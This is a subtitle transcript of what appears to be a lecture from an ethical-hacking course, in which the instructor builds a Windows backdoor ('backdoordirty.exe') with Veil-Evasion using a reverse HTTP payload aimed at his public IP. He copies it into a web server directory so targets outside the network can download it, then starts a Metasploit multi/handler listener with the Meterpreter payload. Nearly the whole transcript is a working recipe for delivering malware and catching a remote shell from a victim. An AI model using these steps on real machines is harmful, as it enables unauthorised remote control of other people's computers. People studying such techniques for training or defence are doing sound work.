1
1

00:00:00,820  -->  00:00:01,653
<v Educator>Okay,</v>
2

2

00:00:01,653  -->  00:00:02,486
so now let's go ahead.
3

3

00:00:02,486  -->  00:00:04,390
Let's create a backdoor,
4

4

00:00:04,390  -->  00:00:07,860
and the only difference is we're gonna set the IP
5

5

00:00:07,860  -->  00:00:11,190
to the public IP instead of the local IP,
6

6

00:00:11,190  -->  00:00:13,290
so we're gonna create a backdoor exactly the same
7

7

00:00:13,290  -->  00:00:15,400
way that we used to create it when we're hacking
8

8

00:00:15,400  -->  00:00:17,310
devices in the same network.
9

9

00:00:17,310  -->  00:00:20,360
So I'm gonna use Veil-Evasion and I'm gonna do
10

10

00:00:20,360  -->  00:00:22,360
this a bit quickly because we've done it
11

11

00:00:22,360  -->  00:00:24,500
and there's nothing new with this,
12

12

00:00:24,500  -->  00:00:26,420
so we can List to see what we have.
13

13

00:00:27,670  -->  00:00:29,640
I'm gonna use number 9 so it's the exact same
14

14

00:00:29,640  -->  00:00:31,910
payload that we used in our previous video.
15

15

00:00:31,910  -->  00:00:34,460
It's the reverse http payload.
16

16

00:00:34,460  -->  00:00:35,660
So we're gonna use 9,
17

17

00:00:37,380  -->  00:00:39,190
and we can see the options here.
18

18

00:00:39,190  -->  00:00:42,160
We can see that the LPORT is set to 8080 by default
19

19

00:00:42,160  -->  00:00:44,070
and I'm gonna keep that the same.
20

20

00:00:44,070  -->  00:00:47,020
The only thing that I'm gonna change is the LHOST,
21

21

00:00:47,020  -->  00:00:49,440
and in the previous videos when we were receiving
22

22

00:00:49,440  -->  00:00:51,720
connections on our own computer,
23

23

00:00:52,620  -->  00:00:55,260
we used to set it to the local IP,
24

24

00:00:55,260  -->  00:00:57,180
so if I do ifconfig wlan0,
25

25

00:00:58,210  -->  00:01:01,840
we used to set it to 192.168.0.1 because that's
26

26

00:01:01,840  -->  00:01:05,070
the IP that the devices use inside the network.
27

27

00:01:05,070  -->  00:01:08,120
Well whenever you want to do things on the outside,
28

28

00:01:08,120  -->  00:01:11,930
we wanna use the real IP because these internal IPs
29

29

00:01:11,930  -->  00:01:15,690
are not visible to computers outside the network.
30

30

00:01:15,690  -->  00:01:17,600
So I'm gonna use the IP that I see on Google,
31

31

00:01:17,600  -->  00:01:19,630
so when I type in 'what's my ip',
32

32

00:01:19,630  -->  00:01:22,490
I get this IP and I'm gonna use that as the
33

33

00:01:22,490  -->  00:01:24,070
LHOST in my backdoor,
34

34

00:01:24,070  -->  00:01:25,420
so I'm just gonna copy this
35

35

00:01:27,690  -->  00:01:28,990
and I'm gonna set it here.
36

36

00:01:33,560  -->  00:01:35,350
And sorry I didn't paste it properly,
37

37

00:01:35,350  -->  00:01:36,183
so set.
38

38

00:01:39,730  -->  00:01:42,150
Hit 'info' to make sure everything is set up properly,
39

39

00:01:42,150  -->  00:01:45,070
so PORT 8080 we're using the public IP,
40

40

00:01:45,070  -->  00:01:48,040
so this is the most important step in this,
41

41

00:01:48,040  -->  00:01:49,790
and then we're gonna do 'generate'.
42

42

00:01:52,970  -->  00:01:55,520
And we're just gonna call this 'backdoordirty.exe'.
43

43

00:01:57,279  -->  00:01:58,930
You're gonna hit Enter.
44

44

00:01:58,930  -->  00:02:01,610
And that has generated my payload for me,
45

45

00:02:01,610  -->  00:02:03,030
so it's stored in here.
46

46

00:02:04,290  -->  00:02:05,123
So again,
47

47

00:02:05,123  -->  00:02:06,950
as usual I'm actually gonna copy this
48

48

00:02:06,950  -->  00:02:08,780
and paste it in my var www html
49

49

00:02:10,501  -->  00:02:12,380
and I'll show you how to actually even download
50

50

00:02:12,380  -->  00:02:15,490
this from the internet from outside the network.
51

51

00:02:15,490  -->  00:02:18,710
So I'm just gonna copy this to my web server directory.
52

52

00:02:24,830  -->  00:02:25,663
Okay,
53

53

00:02:25,663  -->  00:02:27,420
so that's all done.
54

54

00:02:27,420  -->  00:02:30,100
Now all we have to do is just listen for
55

55

00:02:30,100  -->  00:02:31,640
incoming connections.
56

56

00:02:31,640  -->  00:02:34,020
We're gonna do that using the multi/handler,
57

57

00:02:34,020  -->  00:02:35,890
so we've done that before again.
58

58

00:02:35,890  -->  00:02:37,540
I'm just gonna do it real quick.
59

59

00:02:37,540  -->  00:02:39,970
And when I'm gonna listen to the multi/handler,
60

60

00:02:39,970  -->  00:02:42,980
I'm actually gonna listen on my local IP,
61

61

00:02:42,980  -->  00:02:44,840
so I'm not gonna listen on the external,
62

62

00:02:44,840  -->  00:02:46,930
I'm gonna listen on the local because I can't
63

63

00:02:46,930  -->  00:02:48,210
listen on the external.
64

64

00:02:48,210  -->  00:02:50,170
I'm actually in the network and I only have
65

65

00:02:50,170  -->  00:02:52,740
control over my current computer.
66

66

00:02:52,740  -->  00:02:55,150
So what I'm gonna do now is in here,
67

67

00:02:55,150  -->  00:02:58,550
in the Kali machine I'm gonna listen on PORT 8080,
68

68

00:02:58,550  -->  00:03:01,760
and in the external device the backdoor will
69

69

00:03:01,760  -->  00:03:03,500
try to connect to the backdoor,
70

70

00:03:03,500  -->  00:03:07,770
so the step after that we'll set up IP forwarding
71

71

00:03:07,770  -->  00:03:11,370
to allow to tell the router to forward PORTs 8080
72

72

00:03:11,370  -->  00:03:12,720
to the Kali machine,
73

73

00:03:12,720  -->  00:03:14,560
but first we need to listen on
74

74

00:03:14,560  -->  00:03:16,500
PORT 8080 in the Kali machine,
75

75

00:03:16,500  -->  00:03:18,930
and we're gonna do that using the multi/handler.
76

76

00:03:18,930  -->  00:03:20,600
So I'm just gonna do msfconsole.
77

77

00:03:22,410  -->  00:03:23,243
Again,
78

78

00:03:23,243  -->  00:03:25,640
we did this before so I'm gonna do it a little bit quickly.
79

79

00:03:27,440  -->  00:03:29,500
So I'm gonna 'use exploit/multi/handler'.
80

80

00:03:32,280  -->  00:03:33,920
I'm gonna set the payload to
81

81

00:03:33,920  -->  00:03:35,750
windows/meterpreter/reverse_http.
82

82

00:03:43,370  -->  00:03:46,040
Then we're gonna set the LPORT to 8080,
83

83

00:03:50,520  -->  00:03:53,560
so that's the port that we're gonna get connections on,
84

84

00:03:53,560  -->  00:03:55,070
and then I'm gonna set the LHOST,
85

85

00:03:55,070  -->  00:03:55,903
the listening host,
86

86

00:03:55,903  -->  00:03:58,070
to my private IP as I said before,
87

87

00:03:58,070  -->  00:03:58,903
so I'm gonna do
88

88

00:03:58,903  -->  00:03:59,736
'set LHOST
89

89

00:04:01,220  -->  00:04:03,670
to 192.168.0.11'.
90

90

00:04:06,560  -->  00:04:08,150
Now I'm gonna do 'show options' to make sure
91

91

00:04:08,150  -->  00:04:09,550
everything is done properly,
92

92

00:04:11,070  -->  00:04:14,800
and we can see that we have the LPORT is set to 8080
93

93

00:04:14,800  -->  00:04:18,980
and the local host is set to 192.168.0.11
94

94

00:04:18,980  -->  00:04:21,370
and we're using a payload of
95

95

00:04:21,370  -->  00:04:23,520
windows/meterpreter/reverse_http.
96

96

00:04:24,640  -->  00:04:25,590
So it's all good.
97

97

00:04:25,590  -->  00:04:26,740
I'm gonna do 'exploit'.
98

98

00:04:29,200  -->  00:04:30,640
As you can see here,
99

99

00:04:30,640  -->  00:04:33,080
it's listening on my private IP
100

100

00:04:33,080  -->  00:04:35,650
and it's listening on PORT 8080.
101

101

00:04:35,650  -->  00:04:37,560
So now we did the two main steps:
102

102

00:04:37,560  -->  00:04:39,010
we created a backdoor,
103

103

00:04:39,010  -->  00:04:41,890
and the backdoor will give us connections back
104

104

00:04:41,890  -->  00:04:44,210
based on the real IP address,
105

105

00:04:44,210  -->  00:04:47,170
and we're listening on our local machine.
106

106

00:04:47,170  -->  00:04:50,080
We're listening on PORT 8080 in the Kali machine.
107

107

00:04:50,080  -->  00:04:51,770
So when the target person runs the backdoor
108

108

00:04:51,770  -->  00:04:54,100
on the internet they're gonna get,
109

109

00:04:54,100  -->  00:04:55,570
the backdoor will try to connect
110

110

00:04:55,570  -->  00:04:58,330
to this IP on PORT 8080.
111

111

00:04:58,330  -->  00:05:00,810
The only problem now is the Gateway,
112

112

00:05:00,810  -->  00:05:02,940
which is the router right here.
113

113

00:05:02,940  -->  00:05:05,140
It doesn't have PORT 8080 open,
114

114

00:05:05,140  -->  00:05:06,770
so it's gonna receive the connection.
115

115

00:05:06,770  -->  00:05:08,820
It's not gonna know what to do with it,
116

116

00:05:08,820  -->  00:05:10,250
so we actually need to configure
117

117

00:05:10,250  -->  00:05:12,430
the router to tell it whenever you get something,
118

118

00:05:12,430  -->  00:05:15,470
whenever you get a connection on PORT 8080,
119

119

00:05:15,470  -->  00:05:18,030
I want you to redirect it to my Kali machine.
120

120

00:05:19,270  -->  00:05:20,900
And we can do that in two ways,
121

121

00:05:20,900  -->  00:05:23,630
and we're gonna talk about them in the next lecture.